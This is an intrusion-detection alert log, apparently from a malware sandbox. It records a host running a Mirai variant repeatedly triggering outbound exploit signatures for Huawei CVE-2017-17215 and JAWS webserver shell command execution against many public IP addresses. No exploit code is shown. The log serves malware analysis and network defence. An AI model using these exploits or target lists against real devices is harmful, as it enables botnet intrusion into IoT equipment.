                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235460841.51.241.20637215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350582220.16.18.2485501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2350582220.16.18.2485501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2340450157.140.9.19337215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234708441.113.201.6937215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2335052160.178.13.17737215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2353488105.227.1.14437215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233416498.69.174.05501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233416498.69.174.05501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2354746160.22.198.21037215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2359738105.210.196.18037215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2341082157.186.126.20637215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234585476.63.54.2005501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234585476.63.54.2005501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23609882.145.172.1365501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23609882.145.172.1365501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235599283.109.100.1235501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235599283.109.100.1235501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359472114.180.108.2415501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2359472114.180.108.2415501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2342584105.227.56.14037215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2336656157.67.97.17237215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233553014.1.5.245501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233553014.1.5.245501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356828112.118.245.445501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2356828112.118.245.445501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2351414181.107.179.9437215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2347974156.76.92.23837215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339988161.93.231.155501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2339988161.93.231.155501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2354380181.113.46.837215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2339732156.112.214.20537215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2333494156.124.25.3137215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2340984181.180.180.2737215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357452197.41.143.22137215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234065654.152.14.2035501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234065654.152.14.2035501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2341768102.124.8.15737215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2358346197.82.11.25537215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334440207.191.248.2385501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2334440207.191.248.2385501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233578673.77.239.1675501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233578673.77.239.1675501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2360670186.104.15.10037215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355272217.37.173.275501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2355272217.37.173.275501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344390119.58.221.2405501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2344390119.58.221.2405501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353572135.127.152.1255501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2353572135.127.152.1255501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339366183.163.209.1615501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2339366183.163.209.1615501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233591214.247.129.2255501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233591214.247.129.2255501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344098181.222.156.7337215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356690160.187.115.16937215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2335740105.39.38.5037215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233981027.210.15.865501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233981027.210.15.865501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2335892160.196.221.10537215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2352272186.4.185.20537215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2339184223.76.212.18037215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233981497.50.190.615501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233981497.50.190.615501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348722160.217.166.25237215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351844148.52.67.795501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2351844148.52.67.795501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345416125.172.238.565501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2345416125.172.238.565501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356836163.215.128.1365501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2356836163.215.128.1365501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2343728102.179.24.23937215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338708130.51.45.95501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2338708130.51.45.95501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350630100.137.220.1335501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2350630100.137.220.1335501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233648636.238.166.2005501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233648636.238.166.2005501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2345474156.37.232.14437215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2358722223.165.125.5337215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339714170.227.36.1545501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2339714170.227.36.1545501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2359292156.218.93.6437215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234012441.183.83.1585501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234012441.183.83.1585501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233339279.23.120.95501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233339279.23.120.95501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344696155.31.61.335501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2344696155.31.61.335501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234580678.1.178.1905501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234580678.1.178.1905501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348246102.201.210.24337215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353734110.189.70.235501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2353734110.189.70.235501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235162845.0.217.2115501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235162845.0.217.2115501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2343412197.253.135.1337215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346694212.239.177.1305501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2346694212.239.177.1305501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2358908210.168.28.2275501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2358908210.168.28.2275501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2343444102.202.24.5537215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2336510181.44.50.11337215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356782104.217.95.35501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2356782104.217.95.35501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349548188.4.221.1325501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2349548188.4.221.1325501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235925497.38.5.1145501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235925497.38.5.1145501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233303075.58.36.775501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233303075.58.36.775501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234251882.76.197.1235501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234251882.76.197.1235501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344368212.182.219.1575501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2344368212.182.219.1575501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335212208.108.178.955501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2335212208.108.178.955501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2358556190.98.206.8937215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234591657.205.108.2235501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234591657.205.108.2235501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2343244105.178.26.22237215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2353904105.23.115.6437215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2353312160.247.49.11437215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2343892197.202.188.4437215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2342792105.55.152.21937215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234189471.155.44.1855501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234189471.155.44.1855501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356024117.135.64.1005501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2356024117.135.64.1005501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333060156.189.149.1605501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2333060156.189.149.1605501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340686197.128.203.1465501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2340686197.128.203.1465501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234985832.8.187.125501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234985832.8.187.125501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2359500181.41.57.1037215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233936824.130.200.425501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233936824.130.200.425501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234525017.13.227.1055501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234525017.13.227.1055501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233389071.7.61.1565501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233389071.7.61.1565501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335746128.158.20.2155501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2335746128.158.20.2155501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234669447.252.160.865501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234669447.252.160.865501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234778081.54.236.185501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234778081.54.236.185501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2359800181.138.150.8837215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2335056190.92.78.7437215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356938223.105.191.11537215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2345368197.62.222.19837215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2340436105.134.92.22837215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2353414181.98.18.11737215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339128213.153.249.1865501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2339128213.153.249.1865501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2355326160.20.76.1537215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233704053.64.187.865501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233704053.64.187.865501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339360116.1.173.2275501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2339360116.1.173.2275501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235824488.242.206.1615501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235824488.242.206.1615501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235858297.111.16.215501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235858297.111.16.215501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340584164.158.0.2145501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2340584164.158.0.2145501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2345384160.231.169.22237215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354258134.243.229.2015501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2354258134.243.229.2015501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338178134.109.98.705501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2338178134.109.98.705501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356086160.55.188.2437215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357088218.183.204.655501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2357088218.183.204.655501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356814223.184.133.12537215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233907292.236.145.2035501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233907292.236.145.2035501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233560241.168.56.1037215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2335862197.122.206.25037215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2336592197.115.145.9437215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2360346181.199.150.1537215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352934198.108.203.385501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2352934198.108.203.385501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2341270105.52.38.16337215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235377276.249.201.55501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235377276.249.201.55501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2345872102.11.9.18637215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234764867.10.108.305501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234764867.10.108.305501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234222661.57.183.1945501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234222661.57.183.1945501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2337116156.106.175.13137215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338410110.213.169.465501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2338410110.213.169.465501TCP
